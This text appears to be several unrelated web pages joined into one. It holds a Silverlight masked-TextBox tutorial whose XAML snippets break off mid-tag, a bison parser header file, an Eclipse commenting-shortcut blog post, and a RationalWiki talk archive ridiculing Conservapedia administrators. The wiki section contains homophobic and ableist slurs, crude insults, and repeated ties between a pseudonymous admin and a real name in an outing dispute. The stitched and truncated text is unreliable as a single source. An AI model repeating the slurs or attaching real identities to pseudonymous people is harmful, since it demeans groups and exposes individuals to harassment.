Mask characters are almost identical to the characters of the Windows Masked TextBox (see the comments in file TextMaskController.cs). One exception: add a "*" in front of the mask and a user can type the * character followed by "free text". After all, sometimes the preselected formatting just does not fit.

    <g:STextBox x:

In addition, you can supply a MaxLength. Note, however, that you probably need a MaxLength one character more than the Mask (a Silverlight TextBox is always in "insert" mode and hence we need one extra character). While a mask works fine, it does not work out (of course) when we handle different languages/countries. Hence instead of Mask you can use MaskLib:

    <g:STextBox x:

TextBox has a static CultureInfo:

    public static CultureInfo TextBoxCulture = CultureInfo.CurrentUICulture;

If for demonstration we change that to

    TextBoxCulture = new CultureInfo("nl-NL");

Voila, we get to see a Dutch (NL for Netherlands) formatted ZIP code (4 numbers and 2 letters).
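If every STextBox in an application should pick up the same culture, one obvious place to assign that static field is application startup. The snippet below is only a suggestion; it assumes the static lives on STextBox and that the sample's root UserControl is called Page.

    // Sketch (assumption): set the shared culture once, before any STextBox is created.
    private void Application_Startup(object sender, StartupEventArgs e)
    {
        STextBox.TextBoxCulture = new System.Globalization.CultureInfo("nl-NL"); // Dutch formatting for the demo
        this.RootVisual = new Page();
    }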
The ZIP mask lookup that makes the Dutch formatting happen is in ControlHelpers.cs:

    private static string MaskZIP(string country)
    {
        switch (country)
        {
            case "nl": return "0000-LL";
            default: return "00000-9999"; // USA
        }
    }

Of course my library of Masks is very rudimentary, but it will grow (help is welcome)!

All that is left is validation of the data. It is okay for a ValueConverter or a Setter property to throw an error; it will work very similarly to validation. However, a more formal validation is provided as a library. Simply type Validate="" in XAML and an enum will pop up with possible validations. For now, this is a short list (notice how SmallMoney checks to see if a double is valid in the SQL SmallMoney range and number of decimals):

    public enum Validate : byte
    {
        None,
        EmptyString,
        Email,
        Password,
        SmallMoney
    }

So we could provide the following XAML:

    <g:STextBox x:

Now typing a blank value results in:

Hovering over the "error" icon will pop up a tooltip explaining that input for this field is required.

In addition, there is an ErrorConditionEventHandler (test condition, or NullOrEmpty for an error reset):

    public delegate void ErrorConditionEventHandler(string condition);
    public event ErrorConditionEventHandler ErrorCondition;

The event can be useful to let a form know there is an error (and, for instance, disable the "Save" button), as sketched below.
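As an illustration of that last point (not code from the original project), a form could subscribe to the event roughly like this; the SaveButton name and the empty-condition-means-reset convention are assumptions based on the description above:

    // Sketch (assumption): keep Save disabled while any STextBox reports an error condition.
    private void HookValidation(STextBox box)
    {
        box.ErrorCondition += delegate(string condition)
        {
            SaveButton.IsEnabled = String.IsNullOrEmpty(condition); // empty/null condition = error cleared
        };
    }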
http://www.codeproject.com/KB/silverlight/STextBox.aspx
/* Subroutines for bison
   Copyright (C) 1984, 1989, 2000, 2001, 2002. */

#ifndef CLOSURE_H_
# define CLOSURE_H_

# include "gram.h"

/* Allocates the itemset and ruleset vectors, and precomputes useful data
   so that closure can be called.  n is the number of elements to allocate
   for itemset. */

void new_closure (unsigned int n);

/* Given the kernel (aka core) of a state (a vector of item numbers ITEMS,
   of length N), set up RULESET and ITEMSET to indicate what rules could be
   run and which items could be accepted when those items are the active ones.

   RULESET contains a bit for each rule.  CLOSURE sets the bits for all rules
   which could potentially describe the next input to be read.

   ITEMSET is a vector of item numbers; NITEMSET is its size (actually, points
   to just beyond the end of the part of it that is significant).  CLOSURE
   places there the indices of all items which represent units of input that
   could arrive next. */

void closure (item_number *items, size_t n);

/* Frees ITEMSET, RULESET and internal data. */

void free_closure (void);

extern item_number *itemset;
extern size_t nritemset;

#endif /* !CLOSURE_H_ */
http://opensource.apple.com//source/bison/bison-14/src/closure.h
Knowing the Eclipse shortcuts to comment and uncomment a single line or block of code can save you a lot of time while working in Eclipse. In fact, I highly recommend every Java programmer to go through these top 30 Eclipse shortcuts and 10 Java debugging tips in Eclipse for improved productivity.

If you are a Java programmer coding in Eclipse and want to comment and uncomment a single line or block of code quickly, you can use ctrl + / to comment a single line and subsequently uncomment a commented line. If you want to comment a block of code or a complete method, you have two options: you can either line comment (//) all those selected lines or block comment (/* */) those lines. To line comment multiple lines, select the lines and press ctrl + /; it will put // in front of every line. For block commenting in Eclipse, first select all the lines or the code block you want to comment and then enter ctrl + shift + /; it will put /* on the first line and */ on the last line. Here is a better illustrated example of commenting and uncommenting Java code in the Eclipse IDE:

Eclipse shortcut to comment one line or block of code in Java

Say I have this method:

    public void printHello(){
        System.out.println("HelloWorld");
    }

and I want to comment the line which is printing HelloWorld. Just put the cursor on that line and type ctrl + /, and you will see the following:

    public void printHello(){
        // System.out.println("HelloWorld");
    }

If you want to comment a whole method, first select the whole method and then type ctrl + /; this will line comment all selected lines as shown below:

    //public void printHello(){
    //    System.out.println("HelloWorld");
    //}

If you want to block comment a whole block, then type ctrl + shift + / and it will put /* and */ on the first and last line, as shown below:

    /*public void printHello(){
        System.out.println("HelloWorld");
    }*/

This Eclipse shortcut for commenting and uncommenting Java code will surely help you save a few keystrokes and improve your speed while working in Eclipse. To learn more Eclipse comment shortcuts, see Top 30 Eclipse keyboard Shortcuts for Java programmers.

Further Learning: Beginners Eclipse Java IDE Training Course; Eclipse Debugging Techniques And Tricks; The Eclipse Guided Tour - Part 1 and 2; Other Eclipse tutorials for Java programmers.

2 comments:

I Am Facing A Very Unique Problem Rare For Any To Face. When I Am Compiling And Running My Java Code Its Getting Compiled And Shows Output In Text-pad/Eclipse Editor, But When I Am Running It Through saved in a textpad calling in DOS Of Win XP Professional, It Compiling Successfully But When Trying To Run It Though Window's DOS It Throws

    _______My Code States Like This_______
    ________________________________________________
    public class HelloWorld {
        public static void main(String[] args[]) {
            System.out.println("Hello, World");
        }
    }
    ________________________________________________
    Exception in thread "main" java.lang.NoClassDefFoundError: HelloWorld)

Ranjeet, The Java classpath is not set correctly when you are trying to run your Java program directly on the command line, hence the self-evident 'NoClassDefFoundError'.
https://javarevisited.blogspot.com/2012/12/eclipse-shortcut-to-comment-uncomment.html?showComment=1355304046822
Conservapedia talk:What is going on at CP?/Archive178
Creator of "guidelines"[edit] "...the guideline I issued" sayeth TK.img(my emphasis). Well at least we know who's in charge. yummy & honey(or marmalade) 00:38, 15 April 2010 (UTC) Ha![edit] Should be goodimg ("Conservapedia is considering launching a Conservapedia Creation vs. Evolution Project in the future.") Go for it Ken. At least you won't have those pesky evilutionists to contend with like PJR has on his blog. 01:14, 15 April 2010 (UTC)yummy & honey(or marmalade)
~ Kupochama[1][2] 06:04, 14 April 2010 (UTC) - It gets better! That hole-digging smiley, eh, who cares? ħuman 08:26, 14 April 2010 (UTC) - And Timmy TooLoose replies... "Uh huh...." Brilliant. ħuman 08:27, 14 April 2010 (UTC) - It's quite silly indeed. Apparently, this has become a "He Who Must Not Be Named" situation where ANY mention of a certain full name is automatically an outing attempt of TK on CP and WP. The more hilarious part is that his public cries just shine a giant spotlight on it. It's kinda like someone saying "I wonder who did this," and someone else instantly going "IT WASN'T ME, YOU CAN'T PROVE ANYTHING!" Oh well, maybe it'll get me in touch with Jimbo Wales (who has been allegedly informed of this by TK). That'd be kinda cool, I guess. --Sid (talk) 09:03, 14 April 2010 (UTC) - Attention seeking perhaps? Ajkgordon (talk) 09:16, 14 April 2010 (UTC) - At this point, I have no idea what Rob and TK are planning to achieve anymore. Their efforts seem utterly random so far. --Sid (talk) 09:22, 14 April 2010 (UTC) - Indeed. Worse than random, incoherent. However, I think they want Jimbo to block you, me, and Trent until we remove Terry Koeckritz's real name from the internet. ħuman 09:29, 14 April 2010 (UTC) I take it back. This one is even better! In a perverse sort of way, but that's his style, isn't it? ħuman 10:57, 14 April 2010 (UTC) -- Nx / talk 11:29, 14 April 2010 (UTC) - Don't be boring. Also, why does your sig take up a whole line of text, noob? ħuman 11:36, 14 April 2010 (UTC) - Because it conforms to wp:WP:SIG -- Nx / talk 11:40, 14 April 2010 (UTC) - That's a retarded answer. This isn't WP and their policies don't apply here. ħuman 13:55, 14 April 2010 (UTC) Wow, that whole section is just a universe of fail on TK's part. I can imagine what any uninvolved party things when they across that and all they see it TK flailing and screaming, while all the other editors are just calmly asking him WTF he's on about. Bullying, indeed. --Kels (talk) 13:27, 14 April 2010 (UTC) - I wonder which new site Terry Koeckritz is trolling now, that's he's so worried about having his name up in lights. After all, logic would dictate that if he's so worried about CP admin TK being linked to the name Terry Koeckritz, then it must be his name. I'd love to see this go to court: - "Are you Terry Koeckritz?" - "Yes." - "But you're suing these people because they said you were Terry Koeckritz." - At this point the witness became hysterical and was carried from the courtroom, screaming something about "Where's the banhammer? Why can't I oversight this?" --PsyGremlinParla! 17:34, 14 April 2010 (UTC) My goodness. Having just reread the SDG and now seen TK's antics on WP, including calling me a liar, I have to say I've never seen anything quite like TK. TK - I'm not going to tolerate you calling me a liar and I won't be a pawn in your pointless effort to distance TK from Terry Koeckritz. I won't demand that you retract the objective falsehoods you've already made on the WP:Wikiquette page, just that you knock the lying off. Got it buddy? 17:48, 14 April 2010 (UTC) Somebody just posted this extract from the SDG on my blog (I have the ref - SDG/Level_1/29e7df4a2c4a2bd4.html). I think this should shut TK up for once and for all (my emphasis in bold:--PsyGremlinTala! 18:39, 14 April 2010 (UTC) - 29e7df4a2c4a2bd4 19:31, 14 April 2010 (UTC) - I can't find the link right off, but I remember him posting a bunch of our real names last July over on CP for some vindictive reason or another. 
I know mine was there, which is odd since I generally tried to avoid interacting with him, complete with a link to my old comic site. I also remember he and Koward used to delight in posting Ames' full name as well as others' to apparently discredit them if anyone Googled, so it's probably a bit late for him to worry about the morality of "outing" by this point. --Kels (talk) 19:40, 14 April 2010 (UTC) - His openly defamatory talk page diff and the start of a temper tantrum are hereimg. I'm glad he had the good sense to remove that stuff from public view. 19:49, 14 April 2010 (UTC) Moar better[edit] Fucking insane logic I fell off my chair. "Since I am an administrator at another wiki, as you could plainly see on my page, the idea that I would be vandalizing another wiki is pretty remote." And yet, since we are all, oh never mind. ħuman 04:22, 15 April 2010 (UTC) - Vandal sites[citation NOT needed] aren't wikis! Stop remembering my name, Huw Powell! ~ Kupochama[1][2] 05:11, 15 April 2010 (UTC) Deletions[edit] TKimg and DouglasAimg are at the great spring cleaning, freeing Conservapedia not only from pop-culture, but also from atheist propaganda, i.e., articles on works of atheists. Well, Andy once stated Perhaps one should help them to reach the goal of 20,000 entries (currently, there are ~37,000)? TK, have a look at cp:category:years! larronsicut fur in nocte 05:42, 14 April 2010 (UTC) - '[...]You don't grasp the beauty of the destruction of articles. Do you know that Conservapedia is the only encyclopedia in the net whose database gets smaller every year?' - Maquissar did know that, of course. He smiled, sympathetically he hoped, not trusting himself to speak. Schlafly bit off another fragment of the dark-coloured bread, chewed it briefly, and went on: - 'Don't you see that the whole aim of Conservapedia is to narrow the range of thought? In the end we shall make a liberal world-view literally impossible, because there will be no words in which to express it. Every concept that can ever be needed, will be expressed by exactly one article, with its meaning rigidly defined and all its subsidiary meanings rubbed out and forgotten. Already, in the Eleventh Edition, we're not far from that point. But the process will still be continuing long after you and I are dead. Every year fewer and fewer articles, and the range of consciousness always a little smaller. Even now, of course, there's no reason or excuse for indulging in liberalism. It's merely a question of self-discipline, reality-control. But in the end there won't be any need even for that. The Revolution will be complete when Conservapedia is perfect. Conservapedia is Theocon and Theocon is Conservapedia,' he added with a sort of mystical satisfaction. Has it ever occurred to you, Maquissar, that by the year 2050, at the very latest, not a single human being will be alive who could understand such a conversation as we are having now?' - 'Except-' began Maquissar doubtfully, and he stopped. - It had been on the tip of his tongue to say 'Except liberals,' but he checked himself, not feeling fully certain that this remark was not in some way unorthodox. Schlafly, however, had divined what he was about to say. - 'Liberals are not human beings,' he said carelessly. 'By 2050 or earlier, probably -- all real knowledge of Oldview will have disappeared. The whole literature of the past will have been destroyed. 
Russell, Marx, Hemingway, Dawkins -- they'll exist only in Theocon versions, not merely changed into something different, but actually changed into something contradictory of what they used to be. Even the literature of the Party will change. Even the commandments will change. How could you have a commandment like the 90/10 rule against talk, talk, talk, when the concept of debate has been abolished? The whole climate of thought will be different. In fact there will be no thought, as we understand it now. Conservapedia means not thinking -- not needing to think. Conservapedia is unconsciousness.' --George Orwell and Maquissar (talk) 08:00, 14 April 2010 (UTC) - Larron: between 33,000 and 33,100 articles as of yesterday. If I'm not mistaken there is actually less text in the article namespace proper now than there was two years ago. mb 09:56, 14 April 2010 (UTC) Ahh, that explains a lot. It's mostly cover for "disappearing" an embarrassing essay that was linked from elsewhere (and probably included some embarrassing comments by admins too). Subtle, real subtle. --Kels (talk) 13:38, 14 April 2010 (UTC) - The page was written almost entirely by one BHarlan over the course of a few days in October 2008. RJJensen and Terrence Kockfritz made some minor tweaks to it last August. For the most part the page is an ideologically neutral and genuinely informative sysnopsis of the history of the Civil Rights movement. As such it is pretty damning for the Republicans. The article explicitly calls out icons such as Ronald Reagan, William F Buckley, and John McCain for their opposition to Civil Rights legislation, their support of South African Apartheid, and their general bigotry. The article also explicitly mentions that the driving force behind every step forward were liberal Democrats. It heaps scorn on Paleoconservatives to the point of actually using the word. - The page is liberally sprinkled, however, with some hilarious conspiracy crap about Black preachers using hypnosis and brainwashing to keep their parishoners dependent. Black people in general are blamed for making it easy for them. Also, Black people are being lied to about the Democrats by, wait for it, public schools. - The overall effect is that of a very weird pastiche. mb 14:53, 14 April 2010 (UTC) - I figured TK would zap that article as soon as it was linked, so I saved the code as a text file. here's the link. Damn shame I couldn't get the talk page though.... SirChuckBCall the FBI 04:58, 16 April 2010 (UTC) - Found it SirChuckBOne of those deceitful Liberals Schlafly warned you about 05:04, 16 April 2010 (UTC) Anyone Else?[edit] I just had to have a little chuckle when I saw TK bitching about this stupid FoxNews stimulus share calculator. Tell you what TK. We liberals will pay back all the stimulus money, you conservatives take care of the Iraq War and we'll care it even. SirChuckBBoom Goes the Dynamite 08:21, 14 April 2010 (UTC) PS, since you're bloxered over here, feel free to reply on my Wikipedia page. - $39, me. Less than I struggled to send to Haiti. Fine by me. ħuman 08:49, 14 April 2010 (UTC) - From the linked humanevents article - - Hmmmmm no mention of that commie, philandering Clinton....Acei9 10:03, 14 April 2010 (UTC) - Well, only people making money in/living in America need to pay this, which I am not. Fine by me too. ThiehWhat is NOT going on? 14:46, 14 April 2010 (UTC) - $403 was my result, they can send that to me by check or money order please. I do wish my "tax burden" on that pie chat was really that low, lol. 
--BMcP - Just an astronomy guy 21:41, 14 April 2010 (UTC) - BMcP, I think it's your share of the extra national debt (which they allege somehow has to be repaid eventually) due to government spending the stimulus money. Thieh"6+18=24" 01:06, 15 April 2010 (UTC) spam[edit] can't link cus i'm on my cell, but there's some serious spam shit going down in the recent changes Tweety (talk) 17:54, 14 April 2010 (UTC) - Exampleimg. Prob 4chan/Anonymous again. Doubt anything will happen. Andy will just turn off account creation. It's not like they have any new editors anyway. --PsyGremlin話しなさい 18:01, 14 April 2010 (UTC) - Captured, plus a cap request of the non-diff version: From Geology Terms Iimg - It's a silly threat, of course, but judging from what I saw from the Zeuglothingy Blues, it'll likely notch up the paranoia in the new discussion group. Ah well. --Sid (talk) 18:06, 14 April 2010 (UTC) - Oh, fun: Karajou is on it.img --Sid (talk) 18:08, 14 April 2010 (UTC) - I like how his note was longer than a lot of the articles it replaced. Jaxe (talk) 18:13, 14 April 2010 (UTC) - I see Karajerk used his challenge as a handy opportunity to deleteimg his talkpage without archiving. --PsyGremlinTala! 18:22, 14 April 2010 (UTC) - Is this the massive attack everyone is talking about on Ames/Huw/Kel/Sid/Trent's secret discussion site? — Sincerely, Neveruse / Talk / Block 18:27, 14 April 2010 (UTC) - They've already turned off account creation. Not hard to get around though; all they need to do is coordinate account creation, as in create all 512 acccounts in the space of a few minutes. NU - sorry, but these guys are just one part of Operation Shit-smeared Windmill.EddyP (talk) 18:28, 14 April 2010 (UTC) I made a WIGO about it but everyone seems hellbent on removing all traces of the threats. This could be quite funny if they do it properly. I'm guessing it's /b/, yes? Webbtje (talk) 18:44, 14 April 2010 (UTC) - (EC)I threw another little WIGO out there. It all hinges upon whether or not you believe the vandal, but I wouldn't be surprised either way. EddyP (talk) 18:45, 14 April 2010 (UTC) - It could be an interesting standoff, with account creation indefinitely suspended and the CP cabal standing around with their dicks in the hands. Let's see out what happens... — Sincerely, Neveruse / Talk / Block 18:47, 14 April 2010 (UTC) - I like Ken's post on the mainpage about how web traffic is up. Especially: The Asian population of web visitors to Conservapedia (Asians certainly have a reputation for studiousness), is above average according to Quantcast. Go team Conservapedia! Yaaaaaaaaaaay! You go Ken! SJ Debaser 18:52, 14 April 2010 (UTC) - Quick, someone send Karajou/TK/Andy the global blocking script. K61824Insomnia? Masturbate till you pass out 18:59, 14 April 2010 (UTC) Block 19:01, 14 April 2010 (UTC) I like that the 'constant attacks' are only 12 hours a day. I guess their mommys don't let them have computer time after 9pm. - They've oversighted Ken's mainpageright edit. EddyP (talk) 20:39, 14 April 2010 (UTC) - To be fair, they need a job to pay the utilities bill and sleep time for the job too. But then again, Oversighting Ken's edit is a bit over the line. Wait, didn't they say they have bots for this? I guess it has somthing to do with night mode then. K61824[Talk needed] 23:44, 14 April 2010 (UTC) It's on[edit] At least TerryH started itimg (and oversighted the note). 
K61824TK = Terry Koeckritz 19:32, 14 April 2010 (UTC) - Good for the stats, Ken will be pleased OléOléOlé, 12000000 edits in april... Bad because Rob will blame RW and it's suppersekkrit forum/den of evil masterminds...But Thats not RW's style, we strive for sysopship! - Damn you /b/tards!!!! We should Be CP's Forest Rangers... Someone once said something like 'We must preserve this gem of the internet for our grand-childrens... This will be our we used to walk 12 miles in the snow ... look what used to argue with... Alain (past 4:20) - Nothing's happened so far. Sounds like just an empty threat. Now that I think about it, /b/ would probably just attack without making grandiose-sounding threats beforehand. Tetronian you're clueless 01:13, 15 April 2010 (UTC) - Not really, they are first and fore-most attention whores. Before Anonymous attacked the Australian Parliament's website earlier this year they made all these boding videos warning of the attacks, they still garnered very little press outside of the Government owned ABC. - π 01:44, 15 April 2010 (UTC) - They attacked the Australian Parliament? Wow, that's low. Tetronian you're clueless 01:46, 15 April 2010 (UTC) - Given that the week before the Government announced a $22 million cyber-terrorism detection centre, complete with a giant Hollywood style computer screen that appeared to do nothing spanning one wall , it was kind off funny in its own way. - π 02:52, 15 April 2010 (UTC) - What the hell is "cyber-terrorism", anyway? I mean, I know we are, but what are we? ħuman 04:30, 15 April 2010 (UTC) - Something for the government to spend money on to "protect" us from. Also calling people cyber-terrorist sells newspapers. I am more annoyed about the confusion in the media about hackers and crackers. Hackers "hack" at programmes to make them work better/different, so long as it is open source this is legal. A cracker tries to get into a secured system, this is always illegal. I wish the media would learn the difference and stop liabling the noble hacker who only wants to write computer code. - π 04:38, 15 April 2010 (UTC) - What the hell is "cyber-terrorism", anyway? I mean, I know we are, but what are we? ħuman 09:31, 15 April 2010 (UTC) - Well, what we do is, we very cleverly register an account on a wiki that uses nothing more than a simple Turing test to keep you out. So basically, so long as you are not a computer, you can register. We then very stealthily click a button that says "edit" and use it to change the text that appears on the page so that is says something that Andy disagrees with. This is then reverted by the click of a button and our account is blocked so that the "edit" button is no longer available to us. That is, as far as I can tell, the definition of "cyber-terrorism" as being used by Terry Koeckritz. - π 10:59, 15 April 2010 (UTC) How come no one has pointed out that...[edit] - Moved from the Saloon Bar ...the Evolution article currently begins with a charming picture of cross-burning. Also, what the heck is up with all the Skype-spamming? Vulpius (talk) 19:53, 14 April 2010 (UTC) - I love it, although it could use a little hitwin. I'm not sure what the Skype spamming is about, but knowing that Ken is a search engine optimization magnate, I think we'd do best to follow suit. — Sincerely, Neveruse / Talk / Block 20:02, 14 April 2010 (UTC) - - Gah. Sorry for messing up the page. Vulpius (talk) 20:30, 14 April 2010 (UTC) - First it's Hitwin, then it's the Klan. 
should we give Ken a list of racists to be included in the article? ThiehZOYG I edit like Kenservative! 00:06, 15 April 2010 (UTC) - Would it be more fun to tell ♥ K e n D o l l ♥ you have to be a Christian to be in the KKK, or more fun just to let him leave that shit there? --JeevesMkII The gentleman's gentleman at the other site 01:12, 15 April 2010 (UTC) - I think KenLogic works like this: if you are a True Christian, you are not a racist. Also, some evolutionists were racists. Therefore, evolution = racism. Therefore, all evolutionists are racists. Tetronian you're clueless 01:14, 15 April 2010 (UTC) - (Also, I love that his source is an article from Jerry "A billion undergrad degrees, and still a blithering nitwit" Bergman published in the Journal of Creation. Scholarly! Good to see CMI are keeping those standards up. PJR would approve.) --JeevesMkII The gentleman's gentleman at the other site 01:20, 15 April 2010 (UTC) This reminds me...don't search engines usually remove/adjust for sites that abuse the ranking systems? ~ Kupochama[1][2] 03:02, 15 April 2010 (UTC) - Depends on how you are doing it. The two main things the quality control bots look for is reciprocal links, this is why after the initial bump Ken's rankings tend to drop back to lower than they were a few days earlier, and repetitive material, e.g, the same site having multiple copies of the same page or parts of the page. Usually Ken gets good results from the spiders because of all the incoming links, but after a few days when the slower, less frequently run bots come along and look at what is actually going they get dropped back down the page ranks. - π 05:25, 15 April 2010 (UTC) - I'm pretty sure that as far as organizations supporting evolution go, the KKK is pretty damn far down the list. They're your typical "I ain't no monkey" group. DickTurpis (talk) 22:28, 15 April 2010 (UTC) Vandal bot[edit] I'm just curious... what does everyone think about the possibility of that happening? regarding the 521 dudes with open proxies worldwide. teh rational ghey (talk) 02:28, 15 April 2010 (UTC) - Incredibly slim. There are basically no skilled programmers on CP. ħuman 02:51, 15 April 2010 (UTC) - - True, but it a fairly secure site. And they use checkuser very liberally. no pun intended. teh rational ghey (talk) 02:54, 15 April 2010 (UTC) - My guess is that it is most likely some newbie on the /b/ forums thinking CP is a great target for a raid. There is probably only one other person serious about this and the other 519 (mostly socks, but given they are using the same handle who can tell) are playing them for "lulz". They will launch his two man assault to the laughing of all the others. - π 03:27, 15 April 2010 (UTC) - Should we expect a sequel to the FBI incident?. K61824Ed Poor types in Chinese? 06:31, 15 April 2010 (UTC) - FBIII?-- Spirit of the Cherry Blossom 12:52, 15 April 2010 (UTC) - It's just another newf*g who thinks that /b/ is his personal army. Fail levels are low to moderate. -- CodyH (talk) 14:43, 15 April 2010 (UTC) - Can you like not use that word? thanks. 208.125.226.138 (talk) 14:48, 15 April 2010 (UTC) - I'm all for teh gays, but I think we need to take certain uses of the word "fag" back. — Sincerely, Neveruse / Talk / Block 15:05, 15 April 2010 (UTC) - Stupid fucking fags Tweetylet's have buttsecks 15:17, 15 April 2010 (UTC) you're gay. YOUR SO GAY SO FUCKING GAY I read Conservapedia and they said yyer goin to hell! It's a real place ya know. No fer reels. I've been there. with assfly. 
teh rational ghey (talk) 15:23, 15 April 2010 (UTC) - Fags=smokes=cigarettes. Now let's see how many people can resist jokes based on smoking a fag.-- Spirit of the Cherry Blossom 16:35, 15 April 2010 (UTC) The use of 'fag' as an insult conjures up images of frantically masturbating 14 year olds shouting at Counterstrike. I wish people would put a modicum of thought into insulting people, it's much more entertaining. Webbtje (talk) 16:38, 15 April 2010 (UTC) - How could it be made back into a general-purpose insult? It's a good word. I want it back. — Sincerely, Neveruse / Talk / Block 16:42, 15 April 2010 (UTC) - Reminder: we have an article for this. ThiehAhh! my eyes!! 17:13, 15 April 2010 (UTC) - NU, I just rely on the standby general purpose insult of "Fucktard". It's clean, eloquent and hard to misconstrue. In situations requiring more finesse, I tell the offending party to "shut your two-cock garage", which is especially hilarious when the recipient is female. When all else fails, I just ignore the hell out of them. I've dealt with drill sergeants and I live with the most opinionated and vocal female I've ever encountered, so I'm terribly good at blocking everything out and imagining I'm at the circus, watching midget pirates shoot lollipops out of cannons into the crowd from the tightrope. Or whatever. The Foxhole Atheist (talk) 20:19, 15 April 2010 (UTC) - I do have a special affinity for the word "fucktard"...and, of course, I can't think of it without being reminded of Kent Hovind. — Sincerely, Neveruse / Talk / Block 20:22, 15 April 2010 (UTC) - I find the -tard suffix horrible and offensive and I wish people wold stop. you'll be calling people mongols next. Totnesmartin (talk) 20:28, 15 April 2010 (UTC) - I tend to think people horribly offended by words have very small, delicate minds. If people would stop getting offended by words that are just words, all this retarded shit wouldn't be so gay. — Sincerely, Neveruse / Talk / Block 20:30, 15 April 2010 (UTC) - I find selective, aggressive apathy offensive. No offense. ~ Kupochama[1][2] 20:50, 15 April 2010 (UTC) - At least it has to be selective and aggressive to offend you. It's better than "word = offensive", regardless of context. — Sincerely, Neveruse / Talk / Block 20:58, 15 April 2010 (UTC) - Agreed. Then again, I haven't heard anyone say that sort of thing since I was ten. Maybe I don't watch the news enough? ~ Kupochama[1][2] 21:12, 15 April 2010 (UTC) @N: I retract my testimony, you darn mongol. @H: I find those two Ks 66% racist. Stop offending my wiki. ~ Kupochama[1][2] 21:42, 15 April 2010 (UTC) - Aren't Fags obnoxious assholes in leather with noisy motorcycles? Alain (talk) 21:44, 15 April 2010 (UTC) - A fag is a younger boy who you can beat and who toasts your bread at all decent schools. yummy & honey(or marmalade) 21:46, 15 April 2010 (UTC) - Damn straight! Well, straight as far as the public is concernced.-- Spirit of the Cherry Blossom 22:45, 15 April 2010 (UTC) - I've never heard that interpretation. In any case, this conversation certainly took a bizarre turn... Tetronian you're clueless 23:53, 15 April 2010 (UTC) - Fagging yummy & honey(or marmalade) 23:56, 15 April 2010 (UTC) - That explains it, then: we don't use the word that way in the US. (At least, I imagine you would get some oddly offended looks if you did.) Tetronian you're clueless 00:00, 16 April 2010 (UTC) - "When I was at school, we used to line up four or five of his sort, make 'em bend over, and use 'em as a toast rack." 
CrundyTalk nerdy to me 08:20, 16 April 2010 (UTC) Truly, truly, truly outrageous[edit] What is outrageous is that anyone at WP would take all of this standing on chairs and screaming as any sort of serious complaint rather than trolling. I tell you, this is outrageous! --Kels (talk) 00:15, 16 April 2010 (UTC) - While I totally understand the reasons why several RW editors are getting involved in the ongoing saga at WP, I'd like to suggest to them all that a break might be advisable. TK and RobS (TK-CP and Nobs01) are trolling; nothing more, nothing less. None of their complaints are being taken seriously by anybody except people from here. They have managed to get to the point where an admin would be justified in making up to 4 blocks to stop the pointless edit-warring, insult-hurling and general trolling that's going on. - Don't let them do this to you. - There are plenty of other WP/RW crossover editors whom you can tag if necessary. Don't let yourselves become frustrated to the point of gaining a block. - Everybody here should know how TK operates. He will bang on and on about process while all the time lying, and perverting the truth, but calling him a liar isn't going to work. - The position of TK and RobS is untenable and that's obvious. They know that, too. Don't let them score a minor victory by letting yourselves be blocked. –SuspectedReplicant retire me 00:38, 16 April 2010 (UTC) - QFT. -- Nx / talk 00:43, 16 April 2010 (UTC) - He's now claiming in his patented way that I forged the chat log in which he said he was suing TMT. He has also called me a liar and said that my clients and prospective clients might be interested in what he says is my inability to keep confidences. As an attorney I can't have someone who thinks he's anonymous on the internet threatening my business and law license. I'll do what it takes to drive that point home without getting blocked on WP, but thanks for the concern. 01:34, 16 April 2010 (UTC) - Then you should raise that issue on one of the WP noticeboards. Reverting him on his talk page (where he does have the right to remove comments, unfortunately), will only get you blocked. -- Nx / talk 01:39, 16 April 2010 (UTC) - I have no WP-fu. To whose attention do I raise this issue and is there a way to do it privately? 01:54, 16 April 2010 (UTC) - I don't know, maybe wp:WP:RFC/U? -- Nx / talk 02:02, 16 April 2010 (UTC) Wow, that one's impressive. His response to someone complaining that TK's freaking out in an inappropriate place is the blame the victim and ironically bitch about wiki administrators ignoring clear rule violations. It's a masterpiece of trolling, right there. Seriously, if this guy's so obviously just stirring shit up for no clear purpose, is there any official recourse that can be taken there? I don't know WP policy well enough to say. --Kels (talk) 01:47, 16 April 2010 (UTC) - I must say that I agree with Suspected Replicant here. Let TK and RobS dig their graves over at Wikipedia. It already shows that none of the sysops over there give two shits about their complaining. Lord Goonie Hooray! I'm helping! 02:10, 16 April 2010 (UTC) - Am I reading this correctly - is rob suggesting that Rational Wiki material should be included or referenced? Would that make it a reliable source? --Shagie (talk) 05:22, 16 April 2010 (UTC) - The same thought occurred to me but then I realised that I was getting notability confused with reliability. Lily Inspirate me. 
16:12, 16 April 2010 (UTC) - Advice to all, per above, lay low and keep quiet, while the grave-digging is going on. If you are "active" on WP, do what I do as a mouthwash, hit "random page" twenty times and fix anything you see that is wrong. Again, let Knobs and TKnobs dig their own graves. ħuman 08:38, 16 April 2010 (UTC) - For 200 dollar: Violent or unrestrained in temperament or behavior? - *BZZZT* - WHAT IS OUTRAGEOUS --GTac (talk) 11:51, 16 April 2010 (UTC) - Human: Laying low or lying low? K61824Ask me for relationship advice 16:11, 16 April 2010 (UTC) Wow. TK goes away for a few hours (and nobs, coincidentally), and five or so people work on the wording and do a good job of improving it. Then nobs asks an irrelevant question, and TK pops in at the same time, coincidentally, and calls it "unacceptable" and drag the tone down about 5 levels. ħuman 01:32, 17 April 2010 (UTC) Vandal site[edit] I love how TK manages to use every opportunityimg to advertise a certain vandal site, that would otherwise be PNG on CP and the average non-parodist user (stops to laugh hysterically for a moment) would know nothing about them. If you call them, they will come. --PsyGremlinSpeak! 09:56, 16 April 2010 (UTC) - I wonder if there are any other vandal sites out there that think TK is talking about them? That guy who posted the silly threat, for example.194.6.79.200 (talk) 10:55, 16 April 2010 (UTC) - TK, you silly sod, what a stupid, pointless and totally baseless thing to put up on the front page of a so-called "encyclopedia." I can't believe Andy hasn't removed that yet. Godwin's Law, anyone? SJ Debaser 11:51, 16 April 2010 (UTC) - It's Emmanuel Goldstein from 1984! K61824Insomnia? Masturbate till you pass out 13:41, 16 April 2010 (UTC) CEASE AND DESIST[edit] - Halt your vandal attacks, we know it is you, and legal action will be taken.--TKCP (talk) 10:28, 16 April 2010 (UTC) - Lol, not a very good imitation. He usually is TK-CP with the hyphen. - π 10:30, 16 April 2010 (UTC) - I'm not sure if that in itself means it's not Tez, but the capitalised title is suspicious Tweetylet's have buttsecks 10:40, 16 April 2010 (UTC) - I thought he was only talking to us through his lawyer, just like my neighbor down back. Yes, I fight and troll people in real life too. - π 11:42, 16 April 2010 (UTC) - Fixed the odd indenting for you. CrundyTalk nerdy to me 12:15, 16 April 2010 (UTC) Totally irrelevant question in English[edit] Question on English: does "Halt your vandal attacks, we know it is you, 